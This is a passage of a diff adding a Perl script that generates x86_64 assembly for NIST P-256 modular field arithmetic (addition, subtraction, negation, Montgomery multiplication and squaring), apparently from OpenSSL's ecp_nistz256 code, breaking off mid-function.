+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+	$addx = ($1>=2.23);
+}
+
+if (!$addx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+	$addx = ($1>=2.10);
+}
+
+if (!$addx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+	$addx = ($1>=12);
+}
+
+if (!$addx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9])\.([0-9]+)/) {
+	my $ver = $2 + $3/100.0;	# 3.1->3.01, 3.10->3.10
+	$avx = ($ver>=3.0) + ($ver>=3.01);
+	$addx = ($ver>=3.03);
+}
+
+$code.=<<___;
+.text
+.extern	OPENSSL_ia32cap_P
+
+# The polynomial
+.align 64
+.Lpoly:
+.quad 0xffffffffffffffff, 0x00000000ffffffff, 0x0000000000000000, 0xffffffff00000001
+
+# 2^512 mod P precomputed for NIST P256 polynomial
+.LRR:
+.quad 0x0000000000000003, 0xfffffffbffffffff, 0xfffffffffffffffe, 0x00000004fffffffd
+
+.LOne:
+.long 1,1,1,1,1,1,1,1
+.LTwo:
+.long 2,2,2,2,2,2,2,2
+.LThree:
+.long 3,3,3,3,3,3,3,3
+.LONE_mont:
+.quad 0x0000000000000001, 0xffffffff00000000, 0xffffffffffffffff, 0x00000000fffffffe
+___
+
+{
+################################################################################
+# void ecp_nistz256_mul_by_2(uint64_t res[4], uint64_t a[4]);
+
+my ($a0,$a1,$a2,$a3)=map("%r$_",(8..11));
+my ($t0,$t1,$t2,$t3,$t4)=("%rax","%rdx","%rcx","%r12","%r13");
+my ($r_ptr,$a_ptr,$b_ptr)=("%rdi","%rsi","%rdx");
+
+$code.=<<___;
+
+.globl	ecp_nistz256_mul_by_2
+.type	ecp_nistz256_mul_by_2,\@function,2
+.align	64
+ecp_nistz256_mul_by_2:
+	push	%r12
+	push	%r13
+
+	mov	8*0($a_ptr), $a0
+	mov	8*1($a_ptr), $a1
+	add	$a0, $a0		# a0:a3+a0:a3
+	mov	8*2($a_ptr), $a2
+	adc	$a1, $a1
+	mov	8*3($a_ptr), $a3
+	lea	.Lpoly(%rip), $a_ptr
+	 mov	$a0, $t0
+	adc	$a2, $a2
+	adc	$a3, $a3
+	 mov	$a1, $t1
+	sbb	$t4, $t4
+
+	sub	8*0($a_ptr), $a0
+	 mov	$a2, $t2
+	sbb	8*1($a_ptr), $a1
+	sbb	8*2($a_ptr), $a2
+	 mov	$a3, $t3
+	sbb	8*3($a_ptr), $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	pop	%r13
+	pop	%r12
+	ret
+.size	ecp_nistz256_mul_by_2,.-ecp_nistz256_mul_by_2
+
+################################################################################
+# void ecp_nistz256_div_by_2(uint64_t res[4], uint64_t a[4]);
+.globl	ecp_nistz256_div_by_2
+.type	ecp_nistz256_div_by_2,\@function,2
+.align	32
+ecp_nistz256_div_by_2:
+	push	%r12
+	push	%r13
+
+	mov	8*0($a_ptr), $a0
+	mov	8*1($a_ptr), $a1
+	mov	8*2($a_ptr), $a2
+	 mov	$a0, $t0
+	mov	8*3($a_ptr), $a3
+	lea	.Lpoly(%rip), $a_ptr
+
+	 mov	$a1, $t1
+	xor	$t4, $t4
+	add	8*0($a_ptr), $a0
+	 mov	$a2, $t2
+	adc	8*1($a_ptr), $a1
+	adc	8*2($a_ptr), $a2
+	 mov	$a3, $t3
+	adc	8*3($a_ptr), $a3
+	adc	\$0, $t4
+	xor	$a_ptr, $a_ptr		# borrow $a_ptr
+	test	\$1, $t0
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	cmovz	$t2, $a2
+	cmovz	$t3, $a3
+	cmovz	$a_ptr, $t4
+
+	mov	$a1, $t0		# a0:a3>>1
+	shr	\$1, $a0
+	shl	\$63, $t0
+	mov	$a2, $t1
+	shr	\$1, $a1
+	or	$t0, $a0
+	shl	\$63, $t1
+	mov	$a3, $t2
+	shr	\$1, $a2
+	or	$t1, $a1
+	shl	\$63, $t2
+	shr	\$1, $a3
+	shl	\$63, $t4
+	or	$t2, $a2
+	or	$t4, $a3
+
+	mov	$a0, 8*0($r_ptr)
+	mov	$a1, 8*1($r_ptr)
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	pop	%r13
+	pop	%r12
+	ret
+.size	ecp_nistz256_div_by_2,.-ecp_nistz256_div_by_2
+
+################################################################################
+# void ecp_nistz256_mul_by_3(uint64_t res[4], uint64_t a[4]);
+.globl	ecp_nistz256_mul_by_3
+.type	ecp_nistz256_mul_by_3,\@function,2
+.align	32
+ecp_nistz256_mul_by_3:
+	push	%r12
+	push	%r13
+
+	mov	8*0($a_ptr), $a0
+	xor	$t4, $t4
+	mov	8*1($a_ptr), $a1
+	add	$a0, $a0		# a0:a3+a0:a3
+	mov	8*2($a_ptr), $a2
+	adc	$a1, $a1
+	mov	8*3($a_ptr), $a3
+	 mov	$a0, $t0
+	adc	$a2, $a2
+	adc	$a3, $a3
+	 mov	$a1, $t1
+	adc	\$0, $t4
+
+	sub	\$-1, $a0
+	 mov	$a2, $t2
+	sbb	.Lpoly+8*1(%rip), $a1
+	sbb	\$0, $a2
+	 mov	$a3, $t3
+	sbb	.Lpoly+8*3(%rip), $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	cmovz	$t2, $a2
+	cmovz	$t3, $a3
+
+	xor	$t4, $t4
+	add	8*0($a_ptr), $a0	# a0:a3+=a_ptr[0:3]
+	adc	8*1($a_ptr), $a1
+	 mov	$a0, $t0
+	adc	8*2($a_ptr), $a2
+	adc	8*3($a_ptr), $a3
+	 mov	$a1, $t1
+	adc	\$0, $t4
+
+	sub	\$-1, $a0
+	 mov	$a2, $t2
+	sbb	.Lpoly+8*1(%rip), $a1
+	sbb	\$0, $a2
+	 mov	$a3, $t3
+	sbb	.Lpoly+8*3(%rip), $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	pop %r13
+	pop %r12
+	ret
+.size	ecp_nistz256_mul_by_3,.-ecp_nistz256_mul_by_3
+
+################################################################################
+# void ecp_nistz256_add(uint64_t res[4], uint64_t a[4], uint64_t b[4]);
+.globl	ecp_nistz256_add
+.type	ecp_nistz256_add,\@function,3
+.align	32
+ecp_nistz256_add:
+	push	%r12
+	push	%r13
+
+	mov	8*0($a_ptr), $a0
+	xor	$t4, $t4
+	mov	8*1($a_ptr), $a1
+	mov	8*2($a_ptr), $a2
+	mov	8*3($a_ptr), $a3
+	lea	.Lpoly(%rip), $a_ptr
+
+	add	8*0($b_ptr), $a0
+	adc	8*1($b_ptr), $a1
+	 mov	$a0, $t0
+	adc	8*2($b_ptr), $a2
+	adc	8*3($b_ptr), $a3
+	 mov	$a1, $t1
+	adc	\$0, $t4
+
+	sub	8*0($a_ptr), $a0
+	 mov	$a2, $t2
+	sbb	8*1($a_ptr), $a1
+	sbb	8*2($a_ptr), $a2
+	 mov	$a3, $t3
+	sbb	8*3($a_ptr), $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	pop %r13
+	pop %r12
+	ret
+.size	ecp_nistz256_add,.-ecp_nistz256_add
+
+################################################################################
+# void ecp_nistz256_sub(uint64_t res[4], uint64_t a[4], uint64_t b[4]);
+.globl	ecp_nistz256_sub
+.type	ecp_nistz256_sub,\@function,3
+.align	32
+ecp_nistz256_sub:
+	push	%r12
+	push	%r13
+
+	mov	8*0($a_ptr), $a0
+	xor	$t4, $t4
+	mov	8*1($a_ptr), $a1
+	mov	8*2($a_ptr), $a2
+	mov	8*3($a_ptr), $a3
+	lea	.Lpoly(%rip), $a_ptr
+
+	sub	8*0($b_ptr), $a0
+	sbb	8*1($b_ptr), $a1
+	 mov	$a0, $t0
+	sbb	8*2($b_ptr), $a2
+	sbb	8*3($b_ptr), $a3
+	 mov	$a1, $t1
+	sbb	\$0, $t4
+
+	add	8*0($a_ptr), $a0
+	 mov	$a2, $t2
+	adc	8*1($a_ptr), $a1
+	adc	8*2($a_ptr), $a2
+	 mov	$a3, $t3
+	adc	8*3($a_ptr), $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	pop %r13
+	pop %r12
+	ret
+.size	ecp_nistz256_sub,.-ecp_nistz256_sub
+
+################################################################################
+# void ecp_nistz256_neg(uint64_t res[4], uint64_t a[4]);
+.globl	ecp_nistz256_neg
+.type	ecp_nistz256_neg,\@function,2
+.align	32
+ecp_nistz256_neg:
+	push	%r12
+	push	%r13
+
+	xor	$a0, $a0
+	xor	$a1, $a1
+	xor	$a2, $a2
+	xor	$a3, $a3
+	xor	$t4, $t4
+
+	sub	8*0($a_ptr), $a0
+	sbb	8*1($a_ptr), $a1
+	sbb	8*2($a_ptr), $a2
+	 mov	$a0, $t0
+	sbb	8*3($a_ptr), $a3
+	lea	.Lpoly(%rip), $a_ptr
+	 mov	$a1, $t1
+	sbb	\$0, $t4
+
+	add	8*0($a_ptr), $a0
+	 mov	$a2, $t2
+	adc	8*1($a_ptr), $a1
+	adc	8*2($a_ptr), $a2
+	 mov	$a3, $t3
+	adc	8*3($a_ptr), $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	pop %r13
+	pop %r12
+	ret
+.size	ecp_nistz256_neg,.-ecp_nistz256_neg
+___
+}
+{
+my ($r_ptr,$a_ptr,$b_org,$b_ptr)=("%rdi","%rsi","%rdx","%rbx");
+my ($acc0,$acc1,$acc2,$acc3,$acc4,$acc5,$acc6,$acc7)=map("%r$_",(8..15));
+my ($t0,$t1,$t2,$t3,$t4)=("%rcx","%rbp","%rbx","%rdx","%rax");
+my ($poly1,$poly3)=($acc6,$acc7);
+
+$code.=<<___;
+################################################################################
+# void ecp_nistz256_to_mont(
+#   uint64_t res[4],
+#   uint64_t in[4]);
+.globl	ecp_nistz256_to_mont
+.type	ecp_nistz256_to_mont,\@function,2
+.align	32
+ecp_nistz256_to_mont:
+___
+$code.=<<___	if ($addx);
+	mov	\$0x80100, %ecx
+	and	OPENSSL_ia32cap_P+8(%rip), %ecx
+___
+$code.=<<___;
+	lea	.LRR(%rip), $b_org
+	jmp	.Lmul_mont
+.size	ecp_nistz256_to_mont,.-ecp_nistz256_to_mont
+
+################################################################################
+# void ecp_nistz256_mul_mont(
+#   uint64_t res[4],
+#   uint64_t a[4],
+#   uint64_t b[4]);
+
+.globl	ecp_nistz256_mul_mont
+.type	ecp_nistz256_mul_mont,\@function,3
+.align	32
+ecp_nistz256_mul_mont:
+___
+$code.=<<___	if ($addx);
+	mov	\$0x80100, %ecx
+	and	OPENSSL_ia32cap_P+8(%rip), %ecx
+___
+$code.=<<___;
+.Lmul_mont:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___	if ($addx);
+	cmp	\$0x80100, %ecx
+	je	.Lmul_montx
+___
+$code.=<<___;
+	mov	$b_org, $b_ptr
+	mov	8*0($b_org), %rax
+	mov	8*0($a_ptr), $acc1
+	mov	8*1($a_ptr), $acc2
+	mov	8*2($a_ptr), $acc3
+	mov	8*3($a_ptr), $acc4
+
+	call	__ecp_nistz256_mul_montq
+___
+$code.=<<___	if ($addx);
+	jmp	.Lmul_mont_done
+
+.align	32
+.Lmul_montx:
+	mov	$b_org, $b_ptr
+	mov	8*0($b_org), %rdx
+	mov	8*0($a_ptr), $acc1
+	mov	8*1($a_ptr), $acc2
+	mov	8*2($a_ptr), $acc3
+	mov	8*3($a_ptr), $acc4
+	lea	-128($a_ptr), $a_ptr	# control u-op density
+
+	call	__ecp_nistz256_mul_montx
+___
+$code.=<<___;
+.Lmul_mont_done:
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbx
+	pop	%rbp
+	ret
+.size	ecp_nistz256_mul_mont,.-ecp_nistz256_mul_mont
+
+.type	__ecp_nistz256_mul_montq,\@abi-omnipotent
+.align	32
+__ecp_nistz256_mul_montq:
+	########################################################################
+	# Multiply a by b[0]
+	mov	%rax, $t1
+	mulq	$acc1
+	mov	.Lpoly+8*1(%rip),$poly1
+	mov	%rax, $acc0
+	mov	$t1, %rax
+	mov	%rdx, $acc1
+
+	mulq	$acc2
+	mov	.Lpoly+8*3(%rip),$poly3
+	add	%rax, $acc1
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $acc2
+
+	mulq	$acc3
+	add	%rax, $acc2
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $acc3
+
+	mulq	$acc4
+	add	%rax, $acc3
+	 mov	$acc0, %rax
+	adc	\$0, %rdx
+	xor	$acc5, $acc5
+	mov	%rdx, $acc4
+
+	########################################################################
+	# First reduction step
+	# Basically now we want to multiply acc[0] by p256,
+	# and add the result to the acc.
+	# Due to the special form of p256 we do some optimizations
+	#
+	# acc[0] x p256[0..1] = acc[0] x 2^96 - acc[0]
+	# then we add acc[0] and get acc[0] x 2^96
+
+	mov	$acc0, $t1
+	shl	\$32, $acc0
+	mulq	$poly3
+	shr	\$32, $t1
+	add	$acc0, $acc1		# +=acc[0]<<96
+	adc	$t1, $acc2
+	adc	%rax, $acc3
+	 mov	8*1($b_ptr), %rax
+	adc	%rdx, $acc4
+	adc	\$0, $acc5
+	xor	$acc0, $acc0
+
+	########################################################################
+	# Multiply by b[1]
+	mov	%rax, $t1
+	mulq	8*0($a_ptr)
+	add	%rax, $acc1
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*1($a_ptr)
+	add	$t0, $acc2
+	adc	\$0, %rdx
+	add	%rax, $acc2
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*2($a_ptr)
+	add	$t0, $acc3
+	adc	\$0, %rdx
+	add	%rax, $acc3
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*3($a_ptr)
+	add	$t0, $acc4
+	adc	\$0, %rdx
+	add	%rax, $acc4
+	 mov	$acc1, %rax
+	adc	%rdx, $acc5
+	adc	\$0, $acc0
+
+	########################################################################
+	# Second reduction step	
+	mov	$acc1, $t1
+	shl	\$32, $acc1
+	mulq	$poly3
+	shr	\$32, $t1
+	add	$acc1, $acc2
+	adc	$t1, $acc3
+	adc	%rax, $acc4
+	 mov	8*2($b_ptr), %rax
+	adc	%rdx, $acc5
+	adc	\$0, $acc0
+	xor	$acc1, $acc1
+
+	########################################################################
+	# Multiply by b[2]
+	mov	%rax, $t1
+	mulq	8*0($a_ptr)
+	add	%rax, $acc2
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*1($a_ptr)
+	add	$t0, $acc3
+	adc	\$0, %rdx
+	add	%rax, $acc3
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*2($a_ptr)
+	add	$t0, $acc4
+	adc	\$0, %rdx
+	add	%rax, $acc4
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*3($a_ptr)
+	add	$t0, $acc5
+	adc	\$0, %rdx
+	add	%rax, $acc5
+	 mov	$acc2, %rax
+	adc	%rdx, $acc0
+	adc	\$0, $acc1
+
+	########################################################################
+	# Third reduction step	
+	mov	$acc2, $t1
+	shl	\$32, $acc2
+	mulq	$poly3
+	shr	\$32, $t1
+	add	$acc2, $acc3
+	adc	$t1, $acc4
+	adc	%rax, $acc5
+	 mov	8*3($b_ptr), %rax
+	adc	%rdx, $acc0
+	adc	\$0, $acc1
+	xor	$acc2, $acc2
+
+	########################################################################
+	# Multiply by b[3]
+	mov	%rax, $t1
+	mulq	8*0($a_ptr)
+	add	%rax, $acc3
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*1($a_ptr)
+	add	$t0, $acc4
+	adc	\$0, %rdx
+	add	%rax, $acc4
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*2($a_ptr)
+	add	$t0, $acc5
+	adc	\$0, %rdx
+	add	%rax, $acc5
+	mov	$t1, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	8*3($a_ptr)
+	add	$t0, $acc0
+	adc	\$0, %rdx
+	add	%rax, $acc0
+	 mov	$acc3, %rax
+	adc	%rdx, $acc1
+	adc	\$0, $acc2
+
+	########################################################################
+	# Final reduction step	
+	mov	$acc3, $t1
+	shl	\$32, $acc3
+	mulq	$poly3
+	shr	\$32, $t1
+	add	$acc3, $acc4
+	adc	$t1, $acc5
+	 mov	$acc4, $t0
+	adc	%rax, $acc0
+	adc	%rdx, $acc1
+	 mov	$acc5, $t1
+	adc	\$0, $acc2
+
+	########################################################################	
+	# Branch-less conditional subtraction of P
+	sub	\$-1, $acc4		# .Lpoly[0]
+	 mov	$acc0, $t2
+	sbb	$poly1, $acc5		# .Lpoly[1]
+	sbb	\$0, $acc0		# .Lpoly[2]
+	 mov	$acc1, $t3
+	sbb	$poly3, $acc1		# .Lpoly[3]
+	sbb	\$0, $acc2
+
+	cmovc	$t0, $acc4
+	cmovc	$t1, $acc5
+	mov	$acc4, 8*0($r_ptr)
+	cmovc	$t2, $acc0
+	mov	$acc5, 8*1($r_ptr)
+	cmovc	$t3, $acc1
+	mov	$acc0, 8*2($r_ptr)
+	mov	$acc1, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_mul_montq,.-__ecp_nistz256_mul_montq
+
+################################################################################
+# void ecp_nistz256_sqr_mont(
+#   uint64_t res[4],
+#   uint64_t a[4]);
+
+# we optimize the square according to S.Gueron and V.Krasnov,
+# "Speeding up Big-Number Squaring"
+.globl	ecp_nistz256_sqr_mont
+.type	ecp_nistz256_sqr_mont,\@function,2
+.align	32
+ecp_nistz256_sqr_mont:
+___
+$code.=<<___	if ($addx);
+	mov	\$0x80100, %ecx
+	and	OPENSSL_ia32cap_P+8(%rip), %ecx
+___
+$code.=<<___;
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___	if ($addx);
+	cmp	\$0x80100, %ecx
+	je	.Lsqr_montx
+___
+$code.=<<___;
+	mov	8*0($a_ptr), %rax
+	mov	8*1($a_ptr), $acc6
+	mov	8*2($a_ptr), $acc7
+	mov	8*3($a_ptr), $acc0
+
+	call	__ecp_nistz256_sqr_montq
+___
+$code.=<<___	if ($addx);
+	jmp	.Lsqr_mont_done
+
+.align	32
+.Lsqr_montx:
+	mov	8*0($a_ptr), %rdx
+	mov	8*1($a_ptr), $acc6
+	mov	8*2($a_ptr), $acc7
+	mov	8*3($a_ptr), $acc0
+	lea	-128($a_ptr), $a_ptr	# control u-op density
+
+	call	__ecp_nistz256_sqr_montx
+___
+$code.=<<___;
+.Lsqr_mont_done:
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbx
+	pop	%rbp
+	ret
+.size	ecp_nistz256_sqr_mont,.-ecp_nistz256_sqr_mont
+
+.type	__ecp_nistz256_sqr_montq,\@abi-omnipotent
+.align	32
+__ecp_nistz256_sqr_montq:
+	mov	%rax, $acc5
+	mulq	$acc6			# a[1]*a[0]
+	mov	%rax, $acc1
+	mov	$acc7, %rax
+	mov	%rdx, $acc2
+
+	mulq	$acc5			# a[0]*a[2]
+	add	%rax, $acc2
+	mov	$acc0, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $acc3
+
+	mulq	$acc5			# a[0]*a[3]
+	add	%rax, $acc3
+	 mov	$acc7, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $acc4
+
+	#################################
+	mulq	$acc6			# a[1]*a[2]
+	add	%rax, $acc3
+	mov	$acc0, %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t1
+
+	mulq	$acc6			# a[1]*a[3]
+	add	%rax, $acc4
+	 mov	$acc0, %rax
+	adc	\$0, %rdx
+	add	$t1, $acc4
+	mov	%rdx, $acc5
+	adc	\$0, $acc5
+
+	#################################
+	mulq	$acc7			# a[2]*a[3]
+	xor	$acc7, $acc7
+	add	%rax, $acc5
+	 mov	8*0($a_ptr), %rax
+	mov	%rdx, $acc6
+	adc	\$0, $acc6
+
+	add	$acc1, $acc1		# acc1:6<<1
+	adc	$acc2, $acc2
+	adc	$acc3, $acc3
+	adc	$acc4, $acc4
+	adc	$acc5, $acc5
+	adc	$acc6, $acc6
+	adc	\$0, $acc7
+
+	mulq	%rax
+	mov	%rax, $acc0
+	mov	8*1($a_ptr), %rax
+	mov	%rdx, $t0
+
+	mulq	%rax
+	add	$t0, $acc1
+	adc	%rax, $acc2
+	mov	8*2($a_ptr), %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	%rax
+	add	$t0, $acc3
+	adc	%rax, $acc4
+	mov	8*3($a_ptr), %rax
+	adc	\$0, %rdx
+	mov	%rdx, $t0
+
+	mulq	%rax
+	add	$t0, $acc5
+	adc	%rax, $acc6
+	 mov	$acc0, %rax
+	adc	%rdx, $acc7
+
+	mov	.Lpoly+8*1(%rip), $a_ptr
+	mov	.Lpoly+8*3(%rip), $t1
+
+	##########################################
+	# Now the reduction
+	# First iteration
+	mov	$acc0, $t0
+	shl	\$32, $acc0
+	mulq	$t1
+	shr	\$32, $t0
+	add	$acc0, $acc1		# +=acc[0]<<96
+	adc	$t0, $acc2
+	adc	%rax, $acc3
+	 mov	$acc1, %rax
+	adc	\$0, %rdx
+
+	##########################################
+	# Second iteration
+	mov	$acc1, $t0
+	shl	\$32, $acc1
+	mov	%rdx, $acc0
+	mulq	$t1
+	shr	\$32, $t0
+	add	$acc1, $acc2
+	adc	$t0, $acc3
+	adc	%rax, $acc0
+	 mov	$acc2, %rax
+	adc	\$0, %rdx
+
+	##########################################
+	# Third iteration
+	mov	$acc2, $t0
+	shl	\$32, $acc2
+	mov	%rdx, $acc1
+	mulq	$t1
+	shr	\$32, $t0
+	add	$acc2, $acc3
+	adc	$t0, $acc0
+	adc	%rax, $acc1
+	 mov	$acc3, %rax
+	adc	\$0, %rdx
+
+	###########################################
+	# Last iteration
+	mov	$acc3, $t0
+	shl	\$32, $acc3
+	mov	%rdx, $acc2
+	mulq	$t1
+	shr	\$32, $t0
+	add	$acc3, $acc0
+	adc	$t0, $acc1
+	adc	%rax, $acc2
+	adc	\$0, %rdx
+	xor	$acc3, $acc3
+
+	############################################
+	# Add the rest of the acc
+	add	$acc0, $acc4
+	adc	$acc1, $acc5
+	 mov	$acc4, $acc0
+	adc	$acc2, $acc6
+	adc	%rdx, $acc7
+	 mov	$acc5, $acc1
+	adc	\$0, $acc3
+
+	sub	\$-1, $acc4		# .Lpoly[0]
+	 mov	$acc6, $acc2
+	sbb	$a_ptr, $acc5		# .Lpoly[1]
+	sbb	\$0, $acc6		# .Lpoly[2]
+	 mov	$acc7, $t0
+	sbb	$t1, $acc7		# .Lpoly[3]
+	sbb	\$0, $acc3
+
+	cmovc	$acc0, $acc4
+	cmovc	$acc1, $acc5
+	mov	$acc4, 8*0($r_ptr)
+	cmovc	$acc2, $acc6
+	mov	$acc5, 8*1($r_ptr)
+	cmovc	$t0, $acc7
+	mov	$acc6, 8*2($r_ptr)
+	mov	$acc7, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_sqr_montq,.-__ecp_nistz256_sqr_montq
+___
+
+if ($addx) {
+$code.=<<___;
+.type	__ecp_nistz256_mul_montx,\@abi-omnipotent
+.align	32
+__ecp_nistz256_mul_montx:
+	########################################################################
+	# Multiply by b[0]
+	mulx	$acc1, $acc0, $acc1
+	mulx	$acc2, $t0, $acc2
+	mov	\$32, $poly1
+	xor	$acc5, $acc5		# cf=0
+	mulx	$acc3, $t1, $acc3
+	mov	.Lpoly+8*3(%rip), $poly3
+	adc	$t0, $acc1
+	mulx	$acc4, $t0, $acc4
+	 mov	$acc0, %rdx
+	adc	$t1, $acc2
+	 shlx	$poly1,$acc0,$t1
+	adc	$t0, $acc3
+	 shrx	$poly1,$acc0,$t0
+	adc	\$0, $acc4
+
+	########################################################################
+	# First reduction step
+	add	$t1, $acc1
+	adc	$t0, $acc2
+
+	mulx	$poly3, $t0, $t1
+	 mov	8*1($b_ptr), %rdx
+	adc	$t0, $acc3
+	adc	$t1, $acc4
+	adc	\$0, $acc5
+	xor	$acc0, $acc0		# $acc0=0,cf=0,of=0
+
+	########################################################################
+	# Multiply by b[1]
+	mulx	8*0+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc1
+	adox	$t1, $acc2
+
+	mulx	8*1+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc2
+	adox	$t1, $acc3
+
+	mulx	8*2+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc3
+	adox	$t1, $acc4
+
+	mulx	8*3+128($a_ptr), $t0, $t1
+	 mov	$acc1, %rdx
+	adcx	$t0, $acc4
+	 shlx	$poly1, $acc1, $t0
+	adox	$t1, $acc5
+	 shrx	$poly1, $acc1, $t1
+
+	adcx	$acc0, $acc5
+	adox	$acc0, $acc0
+	adc	\$0, $acc0
+
+	########################################################################
+	# Second reduction step
+	add	$t0, $acc2
+	adc	$t1, $acc3
+
+	mulx	$poly3, $t0, $t1
+	 mov	8*2($b_ptr), %rdx
+	adc	$t0, $acc4
+	adc	$t1, $acc5
+	adc	\$0, $acc0
+	xor	$acc1 ,$acc1		# $acc1=0,cf=0,of=0
+
+	########################################################################
+	# Multiply by b[2]
+	mulx	8*0+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc2
+	adox	$t1, $acc3
+
+	mulx	8*1+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc3
+	adox	$t1, $acc4
+
+	mulx	8*2+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc4
+	adox	$t1, $acc5
+
+	mulx	8*3+128($a_ptr), $t0, $t1
+	 mov	$acc2, %rdx
+	adcx	$t0, $acc5
+	 shlx	$poly1, $acc2, $t0
+	adox	$t1, $acc0
+	 shrx	$poly1, $acc2, $t1
+
+	adcx	$acc1, $acc0
+	adox	$acc1, $acc1
+	adc	\$0, $acc1
+
+	########################################################################
+	# Third reduction step
+	add	$t0, $acc3
+	adc	$t1, $acc4
+
+	mulx	$poly3, $t0, $t1
+	 mov	8*3($b_ptr), %rdx
+	adc	$t0, $acc5
+	adc	$t1, $acc0
+	adc	\$0, $acc1
+	xor	$acc2, $acc2		# $acc2=0,cf=0,of=0
+
+	########################################################################
+	# Multiply by b[3]
+	mulx	8*0+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc3
+	adox	$t1, $acc4
+
+	mulx	8*1+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc4
+	adox	$t1, $acc5
+
+	mulx	8*2+128($a_ptr), $t0, $t1
+	adcx	$t0, $acc5
+	adox	$t1, $acc0
+
+	mulx	8*3+128($a_ptr), $t0, $t1
+	 mov	$acc3, %rdx
+	adcx	$t0, $acc0
+	 shlx	$poly1, $acc3, $t0
+	adox	$t1, $acc1
+	 shrx	$poly1, $acc3, $t1
+
+	adcx	$acc2, $acc1
+	adox	$acc2, $acc2
+	adc	\$0, $acc2
+
+	########################################################################
+	# Fourth reduction step
+	add	$t0, $acc4
+	adc	$t1, $acc5
+
+	mulx	$poly3, $t0, $t1
+	 mov	$acc4, $t2
+	mov	.Lpoly+8*1(%rip), $poly1
+	adc	$t0, $acc0
+	 mov	$acc5, $t3
+	adc	$t1, $acc1
+	adc	\$0, $acc2
+
+	########################################################################
+	# Branch-less conditional subtraction of P
+	xor	%eax, %eax
+	 mov	$acc0, $t0
+	sbb	\$-1, $acc4		# .Lpoly[0]
